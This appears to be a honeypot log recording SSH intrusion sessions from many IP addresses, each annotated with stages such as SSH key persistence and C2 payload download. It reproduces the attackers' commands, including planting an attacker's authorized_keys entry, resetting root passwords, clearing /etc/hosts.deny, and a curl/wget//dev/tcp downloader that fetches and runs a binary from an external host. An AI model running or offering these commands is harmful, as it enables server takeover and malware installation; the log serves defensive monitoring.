$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:huFgemg2tASK"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_40 (118.145.228.55) β€” Haidian, China Β· 1 session Β· 19 cmds
2026-05-12 18:05 EDT Β· as root/Aaaa123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:KDWc9hI0ptH0"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_32 (14.103.105.56) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-12 18:04 EDT Β· as root/Abc@123456789
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:qnpwnNclTZVe"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_114 (144.48.243.18) β€” San Po Kong, Hong Kong Β· 1 session Β· 19 cmds
2026-05-12 17:03 EDT Β· as root/Ll123456789
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:XWFWQI52qiXx"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_99 (103.230.120.249) β€” Bangkok, Thailand Β· 1 session Β· 20 cmds
2026-05-12 14:28 EDT Β· as issabel/Itsemoemo2026@Washere2026
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Itsemoemo2026@Washere2026\nkyIT6OFmJhfY\nkyIT6OFmJhfY"|passwd|bash
$ Enter new UNIX password:
$ echo "Itsemoemo2026@Washere2026\nkyIT6OFmJhfY\nkyIT6OFmJhfY\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stein_root_24 (178.104.134.208) β€” Nuremberg, Germany Β· 1 session Β· 1 cmd
2026-05-12 12:26 EDT Β· as root/---fuck_you----
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 dragon_root_33 (150.158.196.236) β€” Shanghai, China Β· 1 session Β· 3 cmds
2026-05-12 11:20 EDT Β· as root/password
echo β†’ payload download from C2 β†’ execute from /tmp
$ echo 1 > /dev/null && cat /bin/echo
$ nohup $SHELL -c "curl http://8.147.63.72:7378/linux -o /tmp/UlMIiNFllh; if [ ! -f /tmp/UlMIiNFllh ]; then wget http://8.147.63.72:7378/linux -O /tmp/UlMIiNFllh; fi; if [ ! -f /tmp/UlMIiNFllh ]; then exec 6<>/dev/tcp/8.147.63.72/7378 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/UlMIiNFllh ; chmod +x /tmp/UlMIiNFllh && /tmp/UlMIiNFllh ugaCfokujnudF8/ICIJ+gjqDe4QV288RnX2JOZR9nRTPwR6Kf4kgi3qBCMjJCIF7ii6LeYQcws4ThW+IMophgh7L1R+KYY0xgHmDF8vOBoB2lDmCYYIXydUUg32AOIl6hgbNywiBf48uiH2LCMrNHIp6gjKae4oIycgVnX2OOJR6hBzNzRWKb4sxgmGCFszVE519iDmAeYUSyNsVimGDN5R9hxDVyRSEdYM2i3yTEszVFId8lDKKd50Vy8EegH2DII54nRTIwgiCdosui3iEHM3JEYNvgi6Le4QIzcgIhH2AN4l4iwbPzAiBfIMui3iCCMrKHol4jzaPb4IXwtUXinaUM49hgRbIwRCDfoo1mn6CE9XJFYJhjTaUfoQQwc0Wgn+PIIt6gwjKzh6dfoM2lH2AEMHNF4t4mjGNeZ0ew9UfnX6KNoB2ixHM2xeEfZQ4jGGCF83VF4p/gDaNd4IGyssQnX6PLoxhgRbOwR+DfIogjnidFM/ICIF/gi6Jf4keyMkfk3yDLoN3nRfKyQiBf4g6gnyGE9vKFIJhjjGUfYIW1coShHWNMYN9kxfIwgiGdpQ4lH2CHM3LF4N6mjGKeZ0Rz9UUgmGIM411hRbKyxOTfoszlHuHCMrPFZ1+iziAdocRyNsXg3mUMYlhgRXVyhKKdYw4i3aTF8rOCIF8iy6NeZ0XzM0chX+LMI9vhRfVyhGCYYw4lH6DEcHNEYF3mjGIfJ0XycIIgX2JLo16iR/LzxSTfoszlH6KCMrLH51+iTeAeYcSyTdzHYH7YEHOrlXMenE=; fi; echo password > /tmp/.opass; chmod +x /tmp/UlMIiNFllh && /tmp/UlMIiNFllh ugaCfokujnudF8/ICIJ+gjqDe4QV288RnX2JOZR9nRTPwR6Kf4kgi3qBCMjJCIF7ii6LeYQcws4ThW+IMophgh7L1R+KYY0xgHmDF8vOBoB2lDmCYYIXydUUg32AOIl6hgbNywiBf48uiH2LCMrNHIp6gjKae4oIycgVnX2OOJR6hBzNzRWKb4sxgmGCFszVE519iDmAeYUSyNsVimGDN5R9hxDVyRSEdYM2i3yTEszVFId8lDKKd50Vy8EegH2DII54nRTIwgiCdosui3iEHM3JEYNvgi6Le4QIzcgIhH2AN4l4iwbPzAiBfIMui3iCCMrKHol4jzaPb4IXwtUXinaUM49hgRbIwRCDfoo1mn6CE9XJFYJhjTaUfoQQwc0Wgn+PIIt6gwjKzh6dfoM2lH2AEMHNF4t4mjGNeZ0ew9UfnX6KNoB2ixHM2xeEfZQ4jGGCF83VF4p/gDaNd4IGyssQnX6PLoxhgRbOwR+DfIogjnidFM/ICIF/gi6Jf4keyMkfk3yDLoN3nRfKyQiBf4g6gnyGE9vKFIJhjjGUfYIW1coShHWNMYN9kxfIwgiGdpQ4lH2CHM3LF4N6mjGKeZ0Rz9UUgmGIM411hRbKyxOTfoszlHuHCMrPFZ1+iziAdocRyNsXg3mUMYlhgRXVyhKKdYw4i3aTF8rOCIF8iy6NeZ0XzM0chX+LMI9vhRfVyhGCYYw4lH6DEcHNEYF3mjGIfJ0XycIIgX2JLo16iR/LzxSTfoszlH6KCMrLH51+iTeAeYcSyTdzHYH7YEHOrlXMenE=" & // payload download from C2
$ head -c 3716336 > /tmp/u1kHm47IMV // execute from /tmp
🎭 dragon_root_34 (120.48.111.71) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-12 09:49 EDT Β· as root/christian
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Dbekaqi3BxYZ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 seoul_root_20 (43.166.4.224) β€” Seoul, South Korea Β· 1 session Β· 19 cmds
2026-05-12 08:25 EDT Β· as root/P@ssword01!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:YoD5OYI9exnv"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 seoul_root_21 (222.108.100.117) β€” Yeongdeungpo-gu, South Korea Β· 2 sessions Β· 38 cmds
2026-05-12 08:07 EDT Β· as root/college, root/sms123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:YC71wzacLY58"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:yiTmA6eEGop1"|chpasswd|bash
🎭 cipher_root_100 (197.248.104.19) β€” Nairobi, Kenya Β· 1 session Β· 20 cmds
2026-05-12 08:05 EDT Β· as ubuntu/1qaz@WSX
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1qaz@WSX\nKJAw5X8q0Sae\nKJAw5X8q0Sae"|passwd|bash
$ Enter new UNIX password:
$ echo "1qaz@WSX\nKJAw5X8q0Sae\nKJAw5X8q0Sae\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 samba_root_11 (45.174.162.68) β€” Bacuri, Brazil Β· 1 session Β· 19 cmds
2026-05-12 08:03 EDT Β· as root/sms123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:1uha0OdFPqIt"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 toque_root (70.54.182.130) β€” Toronto, Canada Β· 11 sessions Β· 220 cmds
2026-05-12 05:06 EDT Β· as devops/devopspass, reza/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—11 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—11 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—11 // CPU profiling
$ echo -e "devopspass\nOUW8zFOGXdbR\nOUW8zFOGXdbR"|passwd|bash
$ Enter new UNIX password: Γ—11
$ echo "devopspass\nOUW8zFOGXdbR\nOUW8zFOGXdbR\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—11 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—11
$ ls -lh $(which ls) Γ—11
$ which ls Γ—11
$ crontab -l Γ—11 // persistence setup
$ w Γ—11 // logged-in users check
$ uname -m Γ—11
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—11 // CPU profiling
$ top Γ—11 // process monitoring
$ uname Γ—11 // OS identification
$ uname -a Γ—11 // OS/kernel identification
$ whoami Γ—11 // privilege check
$ lscpu | grep Model Γ—11
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—11
$ echo -e "devopspass\no9yhC8LLR5gF\no9yhC8LLR5gF"|passwd|bash
$ echo "devopspass\no9yhC8LLR5gF\no9yhC8LLR5gF\n"|passwd
$ echo -e "devopspass\nyLCfqb2JMiRC\nyLCfqb2JMiRC"|passwd|bash
$ echo "devopspass\nyLCfqb2JMiRC\nyLCfqb2JMiRC\n"|passwd
$ echo -e "devopspass\ns92922MmoPOl\ns92922MmoPOl"|passwd|bash
$ echo "devopspass\ns92922MmoPOl\ns92922MmoPOl\n"|passwd
$ echo -e "devopspass\nMl7rtxIrRjoB\nMl7rtxIrRjoB"|passwd|bash
$ echo "devopspass\nMl7rtxIrRjoB\nMl7rtxIrRjoB\n"|passwd
$ echo -e "devopspass\n7w47NyhW2dPb\n7w47NyhW2dPb"|passwd|bash
$ echo "devopspass\n7w47NyhW2dPb\n7w47NyhW2dPb\n"|passwd
$ echo -e "123456\nMCrT6tRy71nb\nMCrT6tRy71nb"|passwd|bash
$ echo "123456\nMCrT6tRy71nb\nMCrT6tRy71nb\n"|passwd
$ echo -e "123456\nNdcnXh4zmJdY\nNdcnXh4zmJdY"|passwd|bash
$ echo "123456\nNdcnXh4zmJdY\nNdcnXh4zmJdY\n"|passwd
$ echo -e "123456\nm7fU1DVLmc5s\nm7fU1DVLmc5s"|passwd|bash
$ echo "123456\nm7fU1DVLmc5s\nm7fU1DVLmc5s\n"|passwd
$ echo -e "123456\n0Yq9qe5cEzfx\n0Yq9qe5cEzfx"|passwd|bash
$ echo "123456\n0Yq9qe5cEzfx\n0Yq9qe5cEzfx\n"|passwd
$ echo -e "123456\nE3jD9gW0s4S6\nE3jD9gW0s4S6"|passwd|bash
$ echo "123456\nE3jD9gW0s4S6\nE3jD9gW0s4S6\n"|passwd
🎭 toucan_3 (186.248.215.50) β€” Belo Horizonte, Brazil Β· 1 session Β· 20 cmds
2026-05-12 04:58 EDT Β· as devops/devopspass
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
